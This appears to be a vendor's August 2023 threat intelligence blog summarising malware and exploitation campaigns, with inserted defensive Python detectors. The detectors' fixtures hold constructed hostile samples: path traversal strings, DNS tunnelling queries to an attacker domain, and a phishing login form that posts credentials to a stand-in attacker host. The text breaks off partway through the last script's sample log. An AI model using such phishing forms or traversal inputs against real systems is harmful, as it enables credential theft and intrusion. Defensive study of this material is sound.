Stay safe from the latest cyber threats: August 2023 Update

Our Application and Threat Intelligence Research Center has been busy over the summer, creating simulations of the latest cyber threats in our Threat Simulator product. In this month’s blog we discuss new threat campaigns and the latest ransomware and malware attacks.

Threat Simulator replicates these real-world threats, allowing you to safely and proactively test your controls and ensure that your security posture is prepared, armed with identifiable Indicators of Compromise (IOCs).

To find out more about how Keysight can help you rapidly find, remediate, and validate exploitable security vulnerabilities before they become headline news, visit our website.

New Threat Campaigns

Kinsing Malware Exploits Novel Openfire Vulnerability

Aquasec released an article describing how threat actors exploited CVE-2023-32315 in Openfire servers to deploy malicious plugins and ultimately execute the Kinsing malware.

The vulnerability allows a normal user to access or interact with files and privileged application modules outside the user’s scope by tampering with the components that store the location paths to those files.

Attackers exploit this path traversal vulnerability to create a new administrator profile and deploy malicious Java plugins, which ultimately download the Kinsing malware and crypto miners.
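The flaw described above is the general path traversal pattern: a user-controlled path is joined to a trusted base directory without checking where the result lands. The following added example, which is not Openfire code and not the fix for CVE-2023-32315, shows a naive lookup beside a hardened one; the base directory and file names are constructed for the illustration.

```python
"""Path traversal: a naive file lookup beside a hardened one.

Added example, not code from Openfire or from the page. The base directory
and file names used here are constructed for illustration only.
"""
import os


def naive_lookup(base_dir: str, user_path: str) -> str:
    """Vulnerable: trusts the caller-supplied path and simply joins it.

    os.path.join discards base_dir entirely when user_path is absolute, and
    '..' segments walk out of base_dir, so the result can point anywhere.
    """
    return os.path.join(base_dir, user_path)


def safe_lookup(base_dir: str, user_path: str) -> str:
    """Hardened: resolve the joined path and require it to stay under base_dir.

    realpath() collapses '..' segments and follows symlinks, so the check is
    made on the path the OS would actually open. commonpath() compares whole
    components, which (unlike a string startswith) does not confuse
    /srv/app with /srv/app2.
    """
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path escapes {base}: {user_path!r}")
    return candidate


def escapes_base(base_dir: str, user_path: str) -> bool:
    """True when the hardened lookup rejects user_path."""
    try:
        safe_lookup(base_dir, user_path)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    # Constructed base directory; it does not need to exist for the check.
    base = "/srv/openfire/plugins"
    for p in ["admin/config.xml", "../../../etc/passwd", "/etc/passwd", "../plugins2/x.jar"]:
        print(f"{p!r:28} naive -> {naive_lookup(base, p)!r:45} escapes: {escapes_base(base, p)}")
```

The third probe in the usage block (`../plugins2/x.jar`) is the case a prefix string comparison gets wrong: it resolves to a sibling directory that merely starts with the base directory's name, and only the component-wise check rejects it.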

Lazarus Group’s infrastructure reuse leads to discovery of new malware

Talos described the Lazarus Group’s shift to other malware such as CollectionRAT, Deimos C2 and a trojanized Plink to achieve persistence and remote access on victim systems.

CollectionRAT has been linked to Lazarus because its signing certificate is the same as that of a previously used malware called Jupiter/EarlyRAT. It collects information about the victim’s system and deploys implants delivered as Microsoft Foundation Class (MFC) files, an alternative binary format similar to a DLL. Implants are first decrypted and unwrapped from this format and then executed.

Deimos C2 is an open-source communication tool able to execute commands issued by the C2 server, dump credentials and self-destruct.

Lastly, Plink is a network tool used to build reverse tunnels for a more obfuscated communication pattern.

Why LaZagne Makes D-Bus API Vigilance Crucial

Unit42 has published a report about the use of LaZagne malware in combination with the D-Bus mechanism in order to extract sensitive data from running applications.

Threat actors have chosen D-Bus APIs as a target because they facilitate communication between applications and services, potentially exposing sensitive data which can later be exploited with different hacktools. They used the LaZagne stealer, a tool highly effective at capturing passwords, to fetch account credentials from those APIs and enable further exploitation.

DarkGate reloaded via malvertising and SEO poisoning campaigns

Malwarebytes has published a report about a new campaign that focuses on a new version of DarkGate malware which lures users to fraudulent websites.

The threat actor used malvertising for this campaign and techniques such as SEO poisoning, which takes advantage of the recommendation algorithm to push malicious decoy pages to the top of the search results. These pages then download the DarkGate malware to the victim’s computer, and some of them even implement advanced fingerprinting checks.

The Tale of Two Exploits – Breaking Down CVE-2023-36884 and the Infection Chain

Trellix published their findings regarding the exploitation of CVE-2023-36884 to execute remote code through specially crafted Microsoft Office documents.

The malicious documents pose as official papers related to the Ukraine World Congress and follow the Office Open XML (OOXML) format. An embedded Rich Text Format (RTF) component is also present inside the document, linked through a lesser-known method called Alternate Format Chunk rather than the more popular and easier to detect Object Linking and Embedding (OLE).

The RTF part contains URLs to remote malicious payloads that the victim may be tricked into downloading.

Flax Typhoon using legitimate software to quietly access Taiwanese organizations

Microsoft has published a report about a campaign by Flax Typhoon, a Chinese threat actor which relies on vulnerabilities in the operating system’s own tools to perform cyber espionage on Taiwanese organizations.

The threat actor uses known vulnerabilities in public-facing services such as VPN, Java and SQL applications to plant a web shell payload that allows remote code execution. It then downloads and runs malware to obtain local system privileges.

Once Flax Typhoon has obtained administrator privileges, it starts establishing a connection to the C2 server by disabling network-level authentication and replacing the Sticky Keys binary. The actor can then launch a terminal, create memory dumps, and take nearly any other action on the compromised system. It downloads SoftEther VPN to establish the connection to the C2.

Finally, the threat actor downloads malware in order to conduct credential access activities. Flax Typhoon targets the Local Security Authority Subsystem Service (LSASS) process memory and Security Account Manager (SAM) registry hive, and also enumerates restore points used by System Restore.

Threat Actor Employs PowerShell-Backed Steganography in Recent Spam Campaigns

Cyble Research and Intelligence Labs has released a report about a new method threat actors use to exploit a vulnerability and spread Remote Access Tools (RATs) to victims’ computers.

Initially, the threat actor sends a spam email with an Excel attachment that, once opened, exploits a vulnerability in the Equation Editor to download a VBScript payload. The script de-obfuscates itself and runs PowerShell code which in the end downloads a JPG file.

This file contains Base64-encoded malware data; once the PowerShell script has parsed it, it injects RATs such as Remcos, AgentTesla or LimeRAT into the victim’s computer.
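A defender can triage images of this kind without running anything: a JPEG ends at its EOI marker, so a large tail after that marker, especially one that decodes as Base64, is the signal to look for. The scanner below is an added example (not from the Cyble report or the page); the stub image bytes and the appended text are constructed, and the check is a heuristic since benign files can also carry trailing metadata.

```python
"""Heuristic scanner for Base64 payloads appended to JPEG files.

Added example, not from the Cyble report or the page. The sample image bytes
and the appended text are constructed here. Treat hits as triage signals:
real images may carry benign trailing data (ICC, XMP, camera metadata).
"""
import base64
import binascii
import re
from typing import List

SOI = b"\xff\xd8"  # JPEG start-of-image marker
EOI = b"\xff\xd9"  # JPEG end-of-image marker
# A long run of Base64 alphabet characters with optional padding.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{256,}={0,2}")


def trailing_bytes(data: bytes) -> bytes:
    """Return whatever follows the last EOI marker (empty for a clean file)."""
    if not data.startswith(SOI):
        raise ValueError("not a JPEG (missing SOI marker)")
    end = data.rfind(EOI)
    if end == -1:
        return b""
    return data[end + len(EOI):]


def decodable_base64_runs(data: bytes) -> List[bytes]:
    """Long Base64-looking runs in data that strictly decode."""
    found = []
    for m in B64_RUN.finditer(data):
        chunk = m.group(0)
        chunk = chunk[: len(chunk) - len(chunk) % 4]  # drop a ragged tail
        try:
            found.append(base64.b64decode(chunk, validate=True))
        except (binascii.Error, ValueError):
            continue
    return found


def scan_jpeg(data: bytes) -> dict:
    """Summarise trailer size and decodable Base64 blobs for triage."""
    trailer = trailing_bytes(data)
    blobs = decodable_base64_runs(trailer)
    return {
        "trailer_bytes": len(trailer),
        "base64_blobs": len(blobs),
        "decoded_preview": blobs[0][:32] if blobs else b"",
        "suspicious": bool(blobs) or len(trailer) > 4096,
    }


# Constructed sample: a stub JPEG (markers only, no real image data) followed
# by a Base64 blob of harmless text standing in for the encoded payload.
CLEAN_JPEG = SOI + b"\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 64 + EOI
PAYLOAD_TEXT = b"constructed sample payload; nothing executable here. " * 8
STEGO_JPEG = CLEAN_JPEG + base64.b64encode(PAYLOAD_TEXT)

if __name__ == "__main__":
    for name, blob in [("clean", CLEAN_JPEG), ("appended", STEGO_JPEG)]:
        print(name, scan_jpeg(blob))
```

On a real mail gateway the same function would run over attachment bodies, and the `decoded_preview` field gives the analyst a first look at what the tail decodes to (script text, an MZ header, or more layers of encoding) without executing it.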

Tunnel Warfare: Exposing DNS Tunneling Campaigns using Generative Models – CoinLoader Case Study

Check Point released an article documenting how CoinLoader malware uses covert DNS tunneling communication to discreetly exchange information with attacker-controlled DNS servers.

Check Point’s discovery of the CoinLoader operations is due to DeepDNS, a deep neural network security tool that identified anomalous domains previously linked to CoinLoader.

CoinLoader is a malware loader with anti-analysis features such as obfuscation and junk code insertion. The malware embeds tiny fragments of victim data inside DNS queries sent to attacker-controlled DNS servers.

CoinLoader has been observed delivered inside archives and executed through DLL sideloading techniques.
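Smuggling data out in query names leaves a recognisable shape in resolver logs: subdomains that are unusually long, high in character entropy and never repeated. The script below is an added example of scoring those signals per registered domain; it is not Check Point's DeepDNS and not code from the page, the log format and every domain in it are constructed, and the "last two labels" rule for the registered domain is a simplification (a production tool would use the public suffix list).

```python
"""Heuristics for spotting DNS-tunnelling style queries in resolver logs.

Added example, not Check Point's DeepDNS and not code from the page. The log
format and all domains below are constructed. Per registered domain, three
signals are scored: long subdomains, high character entropy, and a fresh
subdomain on every query. Two or more together mark the domain suspicious.
"""
import math
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed resolver log: "<timestamp> <client> <qtype> <qname>"
SAMPLE_LOG = """\
2023-08-14T10:00:01Z 10.0.0.12 A www.example-news.test
2023-08-14T10:00:02Z 10.0.0.12 A cdn.example-news.test
2023-08-14T10:00:03Z 10.0.0.12 TXT zq4x9vk2tmb7rp8wn3ydcf6hl5gsj0ae1iou.c0000001.attacker-c2.test
2023-08-14T10:00:03Z 10.0.0.12 TXT 1iouzq4x9vk2tmb7rp8wn3ydcf6hl5gsj0ae.c0000002.attacker-c2.test
2023-08-14T10:00:04Z 10.0.0.12 TXT j0ae1iouzq4x9vk2tmb7rp8wn3ydcf6hl5gs.c0000003.attacker-c2.test
2023-08-14T10:00:04Z 10.0.0.12 TXT l5gsj0ae1iouzq4x9vk2tmb7rp8wn3ydcf6h.c0000004.attacker-c2.test
2023-08-14T10:00:05Z 10.0.0.12 A www.example-news.test
2023-08-14T10:00:06Z 10.0.0.12 A mail.example-news.test
"""


def shannon_entropy(s: str) -> float:
    """Bits per character; 0 for a constant string, log2(n) for n distinct."""
    if not s:
        return 0.0
    counts: Dict[str, int] = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname: str) -> Tuple[str, str]:
    """Split 'a.b.example.test' into ('a.b', 'example.test').

    Assumption: the last two labels are the registered domain.
    """
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def parse_log(text: str) -> List[dict]:
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines
        ts, client, qtype, qname = parts
        sub, dom = split_name(qname)
        rows.append({"ts": ts, "client": client, "qtype": qtype, "sub": sub, "domain": dom})
    return rows


def score_domains(rows: List[dict], max_sub_len: int = 40,
                  entropy_threshold: float = 3.5, min_unique: int = 3) -> Dict[str, dict]:
    """Score each registered domain seen in the parsed rows."""
    by_domain = defaultdict(list)
    for r in rows:
        by_domain[r["domain"]].append(r)
    report = {}
    for dom, rs in by_domain.items():
        subs = {r["sub"] for r in rs}
        avg_len = sum(len(s) for s in subs) / len(subs)
        avg_ent = sum(shannon_entropy(s.replace(".", "")) for s in subs) / len(subs)
        signals = []
        if avg_len > max_sub_len:
            signals.append("long-subdomains")
        if avg_ent > entropy_threshold:
            signals.append("high-entropy")
        if len(subs) >= min_unique and len(subs) == len(rs):
            signals.append("unique-per-query")  # no caching benefit: data, not names
        report[dom] = {
            "queries": len(rs),
            "unique_subdomains": len(subs),
            "avg_len": round(avg_len, 1),
            "avg_entropy": round(avg_ent, 2),
            "txt_queries": sum(1 for r in rs if r["qtype"] == "TXT"),
            "signals": signals,
            "suspicious": len(signals) >= 2,
        }
    return report


if __name__ == "__main__":
    for dom, info in score_domains(parse_log(SAMPLE_LOG)).items():
        print(dom, info)
```

Requiring two concurrent signals keeps ordinary CDN hostnames (long but repeated, or long but low-entropy) out of the alert; tuning the thresholds against a week of your own resolver logs is the expected first step before deploying anything like this.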

Analysis of MS-SQL Server Proxyjacking Cases

AhnLab found that attackers who gain control of public-facing MS-SQL servers through dictionary attacks against passwords deploy proxyware and cryptocurrency miners.

Once attackers successfully guess the user credentials of an MS-SQL server, they download a .NET executable compiled using a novel mechanism provided in the newest versions of the .NET Framework. This mechanism makes malware investigation more difficult.

The executable is just a control module which downloads proxyware such as Traffmonetizer, IPRoyal, Proxtyrack or PacketStream. In addition, crypto miners are also deployed, most notably XMRig.

Traders’ Dollars in Danger: CVE-2023-38831 zero-Day vulnerability in WinRAR exploited by cybercriminals to target traders

Group-IB disclosed their findings regarding the abuse of the CVE-2023-38831 zero-day vulnerability to send victims specially crafted ZIP archives that execute malware instead of the benign files they appear to contain.

The vulnerability is a logic error in how WinRAR looks up files inside an archive. If an attacker includes two similarly named files, they can force the archiver to ignore the correct target document and open the next in line, which during an attack is the malware itself.

This technique has been observed deploying backdoors such as DarkMe, GuLoader and Remcos by tricking users into opening what appears to be an image file; the image is ignored and a batch script with a similar name is executed instead.

Unveiling the Stealthy Exploitation of Microsoft CMSTP Using Malicious LNK Files

Cyble discovered the use of LNK files, generated with a malware build tool called “Quantum Lnk Builder”, to download further attack stages and abuse the Connection Manager Profile Installer (CMSTP) Windows application to open a proxy connection to the C2 server.

Since Office document macros have been disabled, attackers have turned to other executable file formats that can carry the attack scenario.

Such LNK files are delivered through phishing emails and prepare the other stages by downloading various PowerShell malware loaders. By constructing a new configuration file for Connection Manager, attackers bypass the User Account Control (UAC) mechanism and deploy Blank Grabber, RedLine Stealer or NetSupport RAT.

Scarabs colon-izing vulnerable servers

ESET researchers released an article regarding a new Turkish threat group labeled CosmicBeetle, which employs a custom-made framework and other third-party tools to compromise systems and deliver the Scarab ransomware.

The initial step is believed to be the exploitation of the CVE-2020-1472 (ZeroLogon) vulnerability using a .NET tool. The tool also downloads and executes batch and Visual Basic scripts that patch the targeted system with specific Microsoft updates. Researchers state, with low confidence, that some FortiOS vulnerabilities may have been exploited as well.

The custom-made framework consists of three components, all written in Delphi. The first downloads third-party tools and initiates communication with the C2 server. The second deploys and installs the third component. Lastly, the third module works as a backdoor, starts victim reconnaissance and deploys the Scarab ransomware.

The ransomware is also developed in Delphi, encrypts files with specific extensions and replaces crypto wallet addresses stored in clipboard memory with attacker-controlled addresses in order to hijack impending transactions.

From Conti to Akira | Decoding the Latest Linux & ESXi Ransomware Families

SentinelOne published an article presenting the current state of ransomware families such as Monti, Akira, Trigona and Abyss Locker and their spread to Linux and VMware ESXi systems.

All the ransomware families presented have different preferred victim profiles, encryption algorithms and attack options; however, they all share similarities and borrow code from previously known samples of the Babuk, Conti, HelloKitty and PolyVice ransomware.

Agniane Stealer: Dark Web’s Crypto Threat

Zscaler ThreatLabz published a report regarding the discovery of a new information stealer called Agniane Stealer, linked to the Malware-as-a-Service platform Cinoshi Project.

The malware is developed in C# and obfuscated and packed using various tools such as EasyCrypter, PackLab and ConfuserEx.

It includes anti-analysis features that make the program terminate if it is run inside a debugger or if the victim system is emulated inside a malware sandbox. It can also check whether popular tools used by researchers are running and exit discreetly without performing any malicious action.

Regarding stealing capabilities, it can gather credentials stored in the Chrome browser and find session cookies for Telegram, Discord, WinSCP, Steam and OpenVPN. In addition, it collects significant hardware information about the victim system.

Profile Stealers Spread via LLM-themed Facebook Ads

TrendMicro has released a report about the use of large language models as a means to make fake ads on Facebook and spread malicious software.

The threat actor used these new AI models to make fake ads promising users access to powerful tools such as Bard AI or “Meta AI”. These ads contain a shortened link which redirects to Google Drive or Dropbox to download a ZIP file.

The ZIP file contains a simple MSI installer that, once run, installs Chrome extensions. These are information stealers that target cookies, account status, IP addresses and more.

Carderbee: APT Group use Legit Software in Supply Chain Attack Targeting Orgs in Hong Kong

Symantec’s Threat Hunter Team released a report about a series of attacks on multiple organizations by a new threat actor which uses legitimate tools to carry them out.

The threat actor used Cobra DocGuard, a Chinese product which protects, encrypts and decrypts software, to spread its malicious files. In addition, a downloader digitally signed with a Microsoft certificate (Microsoft Windows Hardware Compatibility Publisher) was used to download a malicious ZIP file.

The archive contains an executable which acts as a dropper for different drivers, creating services and registry entries. The injected payload is the Korplug backdoor.

Scattered Spider: The Modus Operandi

Trellix presented a detailed report about multiple campaigns of a threat group known as Scattered Spider/UNC3944/Scatter Swine/Muddled Libra/Roasted 0ktapus targeting various industries such as critical infrastructure and telecommunications.

Their campaigns include the use of two rogue Windows drivers (STONESTOP and POORTRY) used to terminate endpoint security solutions on victim systems and deploy further malware.

In addition, they exploit several vulnerabilities such as CVE-2015-2291 (close security software and bypass detection) or CVE-2021-35464 (execute remote code on Apache Tomcat instances hosted on AWS).

Their techniques have also evolved to include social engineering tactics such as phishing or impersonating IT personnel.

XLoader’s Latest Trick | New macOS Variant Disguised as Signed OfficeNote App

SentinelOne published a report regarding the evolution of the XLoader infostealer for the macOS platform, from a Java-based form to a C and Objective-C variant.

The newly discovered version is signed with an Apple developer certificate that has since been revoked, and masquerades as an office application under the name OfficeNote.

Once executed, it gains persistence on the system, communicates with several C2 servers and attempts to read sensitive Chrome and Firefox browser files in order to steal credentials.

In addition, it possesses anti-debugging features and tries to bypass static analysis tools and endpoint security products.

Chinese Entanglement | DLL Hijacking in the Asian Gambling Sector

SentinelOne published an article presenting details of a Chinese threat group labeled BRONZE STARLIGHT, which delivers vulnerable legitimate applications and backdoors to targets linked to the gambling sector in Southeast Asia.

The initial artifacts used in the attacks are two .NET loaders, inspired by a tool called SharpUnhooker, which try to bypass endpoint defenses and download the next stage from Alibaba Cloud buckets.

Once the download completes, the archive is opened; it contains legitimate applications such as Microsoft Edge or Adobe Creative Cloud that load malicious libraries (DLLs) because of a wrongly configured file location search order. The malicious DLLs use a loading technique called HUI and are shared between multiple Chinese threat actors.

In addition, the attackers stole the signing key of Ivacy VPN in previous campaigns in order to masquerade their malware as safe, benign applications.

The final step is the deployment of Cobalt Strike beacons for C2 communication.

Catching up with WoofLocker the most elaborate traffic redirection scheme to tech support scams

Malwarebytes released an article explaining a very complex and efficient web redirection framework named WoofLocker and its robust infrastructure, which allows attackers to install malware through victims’ browsers.

The attackers leverage compromised websites to inject hidden JavaScript code directly into the victim browser’s DOM in order to fingerprint visitors and choose potential victims.

A victim candidate is one that does not use a virtual machine or specific browser plugins such as GeoEdge or McAfee WebAdvisor or web debugging tools like Fiddler.

Further data exchanged between the attacker’s infrastructure and victims is hidden inside images using steganography.

Finally, victims are redirected to other websites and tricked into installing various programs.

Analysis of APT Attack Cases Targeting Web Services of Korean Corporations

AhnLab has published a comprehensive report about techniques and various Chinese tools used by threat actors conducting APT attacks on Korean web services.

The threat actor started by exploiting a vulnerability in the affected corporation’s website and uploading a web shell used to deliver privilege escalation malware, such as Potato malware. This malware allowed them to attack the target’s IIS servers and MS-SQL database servers.

To maintain persistence, the threat actors used the web shells to display unauthorized advertisement pages on the company’s website, create further web shells and install new malware. This malware grants administrator privileges to the threat actor’s account, allowing it to perform malicious activities.

After that, using the newly granted privileges, the threat actors install tools such as Mimikatz or Runas to collect credentials from the infected systems.

The threat actor also used the web shells to install NetCat for remote control, or Ladon, an open-source hacking tool used primarily by Chinese-speaking threat actors. Once the targeted system is under their control, Ladon lets them carry out a range of malicious behaviors, including scanning, privilege escalation and exfiltration of account credentials.

Mass-spreading campaign targeting Zimbra users

ESET’s WeLiveSecurity blog has published a report on a phishing campaign targeting small and medium businesses and governmental entities on the Zimbra platform.

First, users receive an email with an HTML attachment warning about an email server update, account deactivation or a similar issue. When opened, the attachment displays a fake login page customized to the targeted organization, from which the threat actor steals the victim’s credentials.

Some of the phishing emails came from legitimate companies, which indicates that the attackers may already have compromised some administrator accounts.
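An HTML attachment that renders a login form is easy to triage mechanically: the question is where the form posts. The parser below is an added example (not ESET's detection logic and not code from the page) that flags any form with a password field whose action points outside the organisation's own domain; the two HTML samples, the organisation domain and the collector host are all constructed placeholders.

```python
"""Triage for HTML e-mail attachments carrying a credential-harvesting form.

Added example, not ESET's detection logic and not code from the page. The two
HTML documents, the organisation domain and the collector hostname below are
constructed placeholders.
"""
from html.parser import HTMLParser
from typing import List, Optional
from urllib.parse import urlparse


class FormCollector(HTMLParser):
    """Collect each <form> with its action and the input types it contains."""

    def __init__(self) -> None:
        super().__init__()
        self.forms: List[dict] = []
        self.script_tags = 0
        self._current: Optional[dict] = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(((a.get("type") or "text").lower(), a.get("name") or ""))
        elif tag == "script":
            self.script_tags += 1

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def assess_attachment(html: str, org_domain: str) -> dict:
    """Report forms that collect a password and whether they post externally."""
    p = FormCollector()
    p.feed(html)
    findings = []
    for form in p.forms:
        types = [t for t, _ in form["inputs"]]
        if "password" not in types:
            continue
        host = (urlparse(form["action"]).hostname or "").lower()
        in_org = host == org_domain or host.endswith("." + org_domain)
        findings.append({"action": form["action"], "host": host, "posts_externally": bool(host) and not in_org})
    return {
        "credential_forms": len(findings),
        "external_post": any(f["posts_externally"] for f in findings),
        "script_tags": p.script_tags,  # a form with no action but scripts is worth a look too
        "findings": findings,
    }


# Constructed samples: a lookalike login page posting to a third-party host,
# and a legitimate-looking page posting back to the organisation's own server.
PHISH_HTML = """<html><body>
<h2>Zimbra Mail Server Update</h2>
<p>Your mailbox will be deactivated unless you confirm your credentials.</p>
<form method="post" action="https://collector.example-attacker.test/submit.php">
  <input type="text" name="username" value="user@example-org.test">
  <input type="password" name="password">
  <input type="submit" value="Sign in">
</form></body></html>"""

BENIGN_HTML = """<html><body>
<form method="post" action="https://mail.example-org.test/login">
  <input type="text" name="username"><input type="password" name="password">
  <input type="submit" value="Sign in">
</form></body></html>"""

if __name__ == "__main__":
    print(assess_attachment(PHISH_HTML, "example-org.test"))
    print(assess_attachment(BENIGN_HTML, "example-org.test"))
```

Because these attachments are customised per target, the username is often pre-filled (as in the constructed sample); a gateway rule can combine `external_post` with "HTML attachment from an external sender" to quarantine without blocking legitimate internal forms.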

Ransomware Roundup – Trash Panda and A New Minor Variant of NoCry

Fortinet presented details on the Trash Panda ransomware and a new minor variant of NoCry ransomware.

Even though it is still unknown how the Trash Panda ransomware is being spread, its behavior is similar to that of other ransomware programs. It only encrypts files whose extension appears in the ransomware’s target list. Additionally, it changes the desktop wallpaper and creates a file explaining how to recover the files. Interestingly, the ransom note also carries a political message, suggesting that the ransomware is used against a certain group or country.

NoCry ransomware is built with a custom builder that lets attackers include anti-VM, anti-emulation, anti-debugging and sandbox detection capabilities. NoCry lets victims either pay the ransom to receive their files or pay for a custom decryptor that poses as a genuine product of a cybersecurity company.

Raccoon Stealer Announce Return After Hiatus

Cyberint released a report regarding the return of Raccoon Stealer, after the arrest of one of its creators.

Raccoon Stealer is known to have been built for unlawful commercial purposes as Malware-as-a-Service; it is highly specialized in exfiltrating credentials and secrets from almost 60 applications, but has no deception or defense bypass capabilities of its own. Customers who buy this information stealer combine it with third-party obfuscators, malicious loaders or droppers in order for their attacks to succeed.

Raccoon Stealer is capable of gathering browsing history, cookies and crypto wallet information. Besides the classical approach of inspecting browser data, it can search for known installed desktop applications, capture the encrypted files holding the credentials used by those applications, download the genuine application libraries required to decrypt such files, and exfiltrate the credentials to the C2 server.

Moreover, the attacker can capture screenshots or inject further payloads to be executed after the stealing process is done.

Monti Ransomware Unleashes a New Encryptor for Linux

TrendMicro has released a report on Monti ransomware, a Windows and Linux-based encryptor which is an improved version of the Conti ransomware.

This new variant enhances the functionality of the old one in several ways, such as parameters for terminating virtual machines and the encryption checks used by the ransomware.

MoustachedBouncer: Espionage against foreign diplomats in Belarus

ESET Research presented a new threat actor named MoustachedBouncer that has targeted foreign embassies in Belarus using surveillance equipment installed by Russian and Belarusian security services in ISP infrastructure. The research team also raised the possibility that this threat actor has collaborated with another group named Winter Vivern.

The main strategy is an adversary-in-the-middle attack in which the attackers change the default routing rules of the ISP infrastructure to their own policies, so that benign URLs are redirected to malicious remote hosts.

Initial infection happens by redirecting traffic from a genuine URL distributing Windows updates to a malicious one masquerading as a Microsoft domain.

Two major modular backdoors are delivered, Disco (written in Go) and NightClub (written in C++), responsible for keylogging, screen capture, audio capture and privilege escalation through CVE-2021-1732.

Data exfiltration is accomplished through redirections inside the ISP infrastructure and no C2 servers have been observed.

FortiGuard AI Detects Continued OSS Supply Chain Hidden in Python Package Index

FortiGuard has published a report about malicious Python packages discovered by an AI engine assistant.

These packages contain encrypted malware that tries to steal information such as credit cards, wallets, credentials and others, or install additional malware.

ProxyNation: The dark nexus between proxy apps and malware

AT&T published a follow-up report on the AdLoad campaign and its effects, more specifically the proxy client delivered through it.

The proxy client can target both Windows and macOS platforms; however, the Windows variant goes undetected by antivirus products since it is signed with a valid certificate.

The application is written in Go and is delivered through a popular and free installer named Inno Setup. The proxy client gathers system information in order to increase its traffic performance and allows attackers to remotely control the machine.

When a Zero Day and Access Keys Collide in the Cloud: Responding to the SugarCRM Zero-Day Vulnerability

Unit42 uncovered an incident starting from a zero-day vulnerability (CVE-2023-22952) in SugarCRM which resulted in compromising an entire enterprise cloud infrastructure hosted in AWS.

The exploit achieves remote PHP code execution, compromising the underlying server running the SugarCRM instance. Since these servers are virtual machines hosted in AWS, the attackers used the AWS command line to access other services and resources.

Attackers downloaded and used Pacu, an open-source AWS exploitation framework, and Scout Suite, a cloud security audit tool, in order to gather information about the infrastructure and organization.

Afterwards, the attackers moved laterally through the organization to the Relational Database Service (RDS) in order to steal customer information, or to the EC2 service to create additional machines for C2 communication.

Exploring New Techniques of Fake Browser Updates Leading to NetSupport RAT

Trellix uncovered several incidents similar to the SocGholish campaign, which take control of victim systems through fake Chrome browser updates.

Attackers previously used compromised sites to trick users into downloading fake Chrome browser updates in the form of ZIP archives. Once extracted, a JavaScript file runs and downloads several Visual Basic scripts and batch files. In the end the remote administration tool NetSupport is installed, granting the attacker complete control over the system.

Storm-0978 attacks reveal financial and espionage motives

Microsoft described the latest campaigns involving a Russian threat group known as Storm-0978, RomCom or DEV-0978, which targeted government and military organizations in Europe, predominantly Ukraine, and North America.

The group specializes in delivering malware through trojanized installers posing as genuine applications. However, recent attacks also leveraged the CVE-2023-36884 vulnerability to execute remote code via Word documents.

The final stages of their attacks are either data extortion through deployed ransomware (Industrial Spy/Underground and Trigona) or cyber espionage by injecting the RomCom backdoor, harvesting credentials and moving laterally through the compromised network.

Common TTPs of attacks against industrial organizations. Implants for uploading data

Kaspersky released the third chapter of their research, focusing on the data exfiltration tools observed during attacks on industrial infrastructure.

While the first chapter covers remote access and reconnaissance and the second is centered on file gathering, the latest article presents ways of exfiltrating, as discreetly as possible, the information captured in the previous steps.

Their findings involve sending files to Dropbox or to other compromised remote hosts within the company, which then forward them to the real C2 server.

Other clues uncovered manual attempts to send files using Yandex disk or 16 other file sharing services.

In addition, a malware implant automatically builds an email with the sensitive information attached and sends it through the Yandex email service.

Updated Kmsdx Binary Shows KmsdBot Is Targeting the IoT Landscape

Akamai released a report on the KmsdBot malware campaign targeting IoT devices, now in its fourth version, with an updated Kmsdx binary that scans random IP addresses for open SSH ports and attempts to log in with a password list downloaded from a C2 server.

The malware downloads a text file with a list of credentials for different applications, containing a number of commonly used weak passwords and combinations of them. This matters for IoT devices because most of them are left with default credentials, making them attractive targets for threat actors building a network of infected systems.
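Both the MS-SQL proxyjacking cases above and this KmsdBot campaign begin with a password list thrown at an exposed service, and both leave the same trace: one source producing many failed logins for many different accounts in a short window. The detector below is an added example (not from AhnLab's or Akamai's reports) that parses OpenSSH "Failed password" lines and SQL Server ERRORLOG "Login failed for user" lines into one event stream and scores each source; the log lines, hostnames and addresses are constructed, and the log year is assumed because syslog timestamps omit it.

```python
"""Failed-login burst detector for sshd and MS-SQL logs.

Added example, not from AhnLab's or Akamai's reports. The two regular
expressions cover the common shape of OpenSSH "Failed password" lines and of
the SQL Server ERRORLOG "Login failed for user" line; every sample line,
hostname and address below is constructed. Syslog lines carry no year, so
the year is an assumed parameter.
"""
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Optional, Tuple

SSHD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>[\d.]+) port \d+"
)
MSSQL_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\.\d+ Logon\s+Login failed for user "
    r"'(?P<user>[^']+)'.*\[CLIENT: (?P<src>[\d.]+)\]"
)

# Constructed sample: an SSH password-list run, one legitimate typo, and an
# MS-SQL dictionary attack against several common account names.
SAMPLE_LOG = """\
Aug 14 10:00:01 edge sshd[2211]: Failed password for root from 203.0.113.5 port 51234 ssh2
Aug 14 10:00:03 edge sshd[2212]: Failed password for invalid user admin from 203.0.113.5 port 51240 ssh2
Aug 14 10:00:05 edge sshd[2213]: Failed password for invalid user pi from 203.0.113.5 port 51244 ssh2
Aug 14 10:00:08 edge sshd[2214]: Failed password for invalid user ubuntu from 203.0.113.5 port 51250 ssh2
Aug 14 10:00:11 edge sshd[2215]: Failed password for invalid user support from 203.0.113.5 port 51255 ssh2
Aug 14 10:00:15 edge sshd[2216]: Failed password for invalid user user from 203.0.113.5 port 51260 ssh2
Aug 14 10:02:40 edge sshd[2300]: Failed password for alice from 10.0.0.9 port 40022 ssh2
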